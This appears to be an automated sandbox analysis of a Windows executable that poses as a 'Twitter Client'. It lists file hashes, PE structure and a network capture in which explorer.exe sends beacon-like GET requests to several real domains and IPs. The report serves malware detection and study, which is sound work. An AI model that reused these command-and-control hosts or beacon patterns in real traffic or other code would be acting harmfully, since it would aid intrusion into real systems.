                                                                                                                              SHA256:166559731ad15341f955bf8a16708f93542bef868c33f02f70e9b27f57b991a3
                                                                                                                              SHA512:952420118839a1aa8fb2c498910d784aeacb2a9ed953845415e7c523c41f0d3755ec6fcda769e6045c0677d4a002d86b278876b877fc058054f95774b15332ab
                                                                                                                              SSDEEP:12288:BB6AGIF/OXu5OtiBIZzG/NoC9NPNIQt5XyGY0:JGIF3wOI5G1oCXPzTVY
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0.................. ........@.. ....................................@................................

                                                                                                                              File Icon

                                                                                                                              Icon Hash:00828e8e8686b000

                                                                                                                              Static PE Info

                                                                                                                              General

                                                                                                                              Entrypoint:0x49a282
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                                              Time Stamp:0x61518E8B [Mon Sep 27 09:27:39 2021 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:v4.0.30319
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                              Entrypoint Preview

                                                                                                                              Instruction
                                                                                                                              jmp dword ptr [00402000h]
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al
                                                                                                                              add byte ptr [eax], al

                                                                                                                              Data Directories

                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x9a2300x4f.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x9c0000x618.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x9e0000xc.reloc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                              Sections

                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x20000x982880x98400False0.721873717159data7.30848087754IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                              .rsrc0x9c0000x6180x800False0.3349609375data3.46990850393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .reloc0x9e0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                              Resources

                                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                                              RT_VERSION0x9c0900x386data
                                                                                                                              RT_MANIFEST0x9c4280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                                              Imports

                                                                                                                              DLLImport
                                                                                                                              mscoree.dll_CorExeMain

                                                                                                                              Version Infos

                                                                                                                              DescriptionData
                                                                                                                              Translation0x0000 0x04b0
                                                                                                                              LegalCopyrightCopyright 2016 - 2021 Hanalen
                                                                                                                              Assembly Version0.28.3.1
                                                                                                                              InternalNameMCMWrapperDictiona.exe
                                                                                                                              FileVersion0.28.3.1
                                                                                                                              CompanyName
                                                                                                                              LegalTrademarks
                                                                                                                              Comments
                                                                                                                              ProductNameTwitter Client
                                                                                                                              ProductVersion0.28.3.1
                                                                                                                              FileDescriptionTwitter Client
                                                                                                                              OriginalFilenameMCMWrapperDictiona.exe

                                                                                                                              Network Behavior

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Sep 27, 2021 18:05:11.529373884 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.636533022 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.636631966 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.636744022 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.743427038 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757265091 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757296085 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.757431984 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.757507086 CEST4980480192.168.2.4104.143.9.211
                                                                                                                              Sep 27, 2021 18:05:11.864582062 CEST8049804104.143.9.211192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:16.957498074 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.177325964 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.177617073 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.177975893 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.396378040 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.686033010 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:17.898016930 CEST8049806154.208.82.163192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:17.898099899 CEST4980680192.168.2.4154.208.82.163
                                                                                                                              Sep 27, 2021 18:05:27.853636026 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.029695988 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.029774904 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.029920101 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.206176996 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208403111 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208427906 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208453894 CEST8049807103.11.189.189192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:28.208621025 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.208658934 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:28.208756924 CEST4980780192.168.2.4103.11.189.189
                                                                                                                              Sep 27, 2021 18:05:38.487253904 CEST4980880192.168.2.4143.198.15.243
                                                                                                                              Sep 27, 2021 18:05:41.500272989 CEST4980880192.168.2.4143.198.15.243
                                                                                                                              Sep 27, 2021 18:05:47.500781059 CEST4980880192.168.2.4143.198.15.243

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Sep 27, 2021 18:03:35.164730072 CEST4971453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:03:35.182537079 CEST53497148.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:06.959781885 CEST5802853192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:06.990171909 CEST53580288.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:25.512123108 CEST5309753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:25.526983023 CEST53530978.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:26.600256920 CEST4925753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:26.621587038 CEST53492578.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:28.010369062 CEST6238953192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:28.077197075 CEST53623898.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:28.841510057 CEST4991053192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:28.942997932 CEST53499108.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:29.523184061 CEST5585453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:29.552921057 CEST53558548.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:29.564763069 CEST6454953192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:29.577709913 CEST53645498.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:30.001899004 CEST6315353192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:30.014921904 CEST53631538.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:30.823194981 CEST5299153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:30.836411953 CEST53529918.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:31.864636898 CEST5370053192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:31.877384901 CEST53537008.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:33.357884884 CEST5172653192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:33.430949926 CEST53517268.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:36.017194986 CEST5679453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:36.117326975 CEST53567948.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:36.820691109 CEST5653453192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:36.925689936 CEST53565348.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:38.028016090 CEST5662753192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:38.088311911 CEST53566278.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:04:46.045958042 CEST5662153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:04:46.064748049 CEST53566218.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:06.173321009 CEST6311653192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:06.195317984 CEST53631168.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:11.418425083 CEST6407853192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST53640788.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:16.769006014 CEST6480153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:16.955238104 CEST53648018.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:27.743536949 CEST6172153192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:27.852567911 CEST53617218.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:33.223629951 CEST5125553192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:33.266285896 CEST53512558.8.8.8192.168.2.4
                                                                                                                              Sep 27, 2021 18:05:38.286906958 CEST6152253192.168.2.48.8.8.8
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST53615228.8.8.8192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Sep 27, 2021 18:05:06.173321009 CEST192.168.2.48.8.8.80x7514Standard query (0)www.emptycc.netA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.418425083 CEST192.168.2.48.8.8.80xc089Standard query (0)www.vetpipes.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:16.769006014 CEST192.168.2.48.8.8.80x5964Standard query (0)www.omniriot.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:27.743536949 CEST192.168.2.48.8.8.80x354fStandard query (0)www.rangerbuddys.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:33.223629951 CEST192.168.2.48.8.8.80x5b1eStandard query (0)www.traexcel.comA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.286906958 CEST192.168.2.48.8.8.80x6940Standard query (0)www.marmorariapiramide.onlineA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Sep 27, 2021 18:05:06.195317984 CEST8.8.8.8192.168.2.40x7514Name error (3)www.emptycc.netnonenoneA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST8.8.8.8192.168.2.40xc089No error (0)www.vetpipes.com104.143.9.211A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:11.525573015 CEST8.8.8.8192.168.2.40xc089No error (0)www.vetpipes.com104.143.9.210A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:16.955238104 CEST8.8.8.8192.168.2.40x5964No error (0)www.omniriot.com154.208.82.163A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:27.852567911 CEST8.8.8.8192.168.2.40x354fNo error (0)www.rangerbuddys.com103.11.189.189A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:33.266285896 CEST8.8.8.8192.168.2.40x5b1eName error (3)www.traexcel.comnonenoneA (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)www.marmorariapiramide.onlinemarmorariapiramide.onlineCNAME (Canonical name)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)marmorariapiramide.online143.198.15.243A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)marmorariapiramide.online2.57.90.16A (IP address)IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • www.vetpipes.com
                                                                                                                              • www.omniriot.com
                                                                                                                              • www.rangerbuddys.com

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.449804104.143.9.21180C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:11.636744022 CEST7941OUTGET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1
                                                                                                                              Host: www.vetpipes.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              Sep 27, 2021 18:05:11.757265091 CEST7943INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 27 Sep 2021 16:05:11 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ==
                                                                                                                              Data Raw: 33 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4d 4c 6c 30 52 4a 59 63 44 53 30 4e 32 78 49 67 69 30 31 72 4f 41 63 45 74 76 43 55 54 55 71 2b 49 75 4e 7a 35 50 41 38 65 58 59 73 66 50 4c 52 6b 67 6e 4e 65 68 4f 2b 4e 62 4f 5a 41 6c 4c 6f 51 6e 53 70 42 35 72 58 75 52 78 52 43 54 46 2b 54 31 69 55 39 73 43 41 77 45 41 41 51 3d 3d 5f 46 7a 72 55 30 4f 2f 44 7a 50 48 77 68 55 48 71 76 6f 31 7a 73 72 5a 64 36 4f 59 68 59 2f 43 4b 6d 4d 62 66 6b 49 70 4d 34 48 6b 71 70 55 4c 56 73 6e 44 61 5a 4e 70 42 52 79 43 56 65 75 30 75 67 70 4f 32 58 6f 73 32 4e 58 64 6a 47 74 51 6f 58 32 37 77 47 51 3d 3d 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 76 65 74 70 69 70 65 73 2e 63 6f 6d 20 61 74 20 44 69 72 65 63 74 6e 69 63 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 69 66 72 61 6d 65 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 7d 0a 68 74 6d 6c 2c 20 64 69 76 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 62 6f 64 79 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 20 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 30 35 30 30 30 35 2e 76 6f 6f 64 6f 6f 2e 63 6f 6d 2f 6a 73 2f 70 61 72 74 6e 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 310<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ=="><head><title>vetpipes.com at Directnic</title><style>html, body, iframe {margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}html, div {height:100%;}body{line-height:1.5;height:100%;}</style></head><body><div id="partner" ></div><script type="text/javascript" language="JavaScript" src="http://050005.voodoo.com/js/partner.js"></script></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              1192.168.2.449806154.208.82.16380C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:17.177975893 CEST7948OUTGET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1
                                                                                                                              Host: www.omniriot.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              2192.168.2.449807103.11.189.18980C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:28.029920101 CEST7950OUTGET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1
                                                                                                                              Host: www.rangerbuddys.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              Sep 27, 2021 18:05:28.208403111 CEST7950INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 27 Sep 2021 16:05:28 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 32 39 61 0d 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 20 69 64 3d 22 6e 65 77 2d 62 6f 78 22 3e 3c 68 33 3e 2a 2e 63 6f 6d 20 69 73 20 61 20 72 65 67 69 73 74 65 72 65 64 20 64 6f 6d 61 69 6e 2e 3c 62 72 3e 0a 09 09 54 68 69 73 20 69 73 20 61 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 66 6f 72 20 74 68 65 20 77 65 62 73 69 74 65 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 3e 49 66 20 79 6f 75 20 77 6f 75 6c 64 20 6c 69 6b 65 20 74 6f 20 3c 73 74 72 6f 6e 67 3e 68 6f 73 74 20 61 20 77 65 62 73 69 74 65 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6f 62 74 61 69 6e 20 61 20 70 65 72 73 6f 6e 61 6c 69 73 65 64 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6c 69 6e 6b 20 75 70 20 74 6f 20 47 6f 6f 67 6c 65 20 61 70 70 73 3c 2f 73 74 72 6f 6e 67 3e 2e 20 44 6f 20 67 65 74 20 69 6e 20 74 6f 75 63 68 20 77 69 74 68 20 75 73 2e 3c 62 72 3e 0a 09 09 20 56 6f 64 69 65 6e 20 6f 66 66 65 72 73 20 53 69 6e 67 61 70 6f 72 65 20 68 6f 73 74 65 64 20 73 65 72 76 65 72 73 20 66 6f 72 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 22 3e 53 69 6e 67 61 70 6f 72 65 20 57 65 62 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 73 69 6e 67 61 70 6f 72 65 2d 65 6d 61 69 6c 2d 68 6f 73 74 69 6e 67 2e 70 68 70 22 3e 53 69 6e 67 61 70 6f 72 65 20 45 6d 61 69 6c 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 73 65 72 76 69 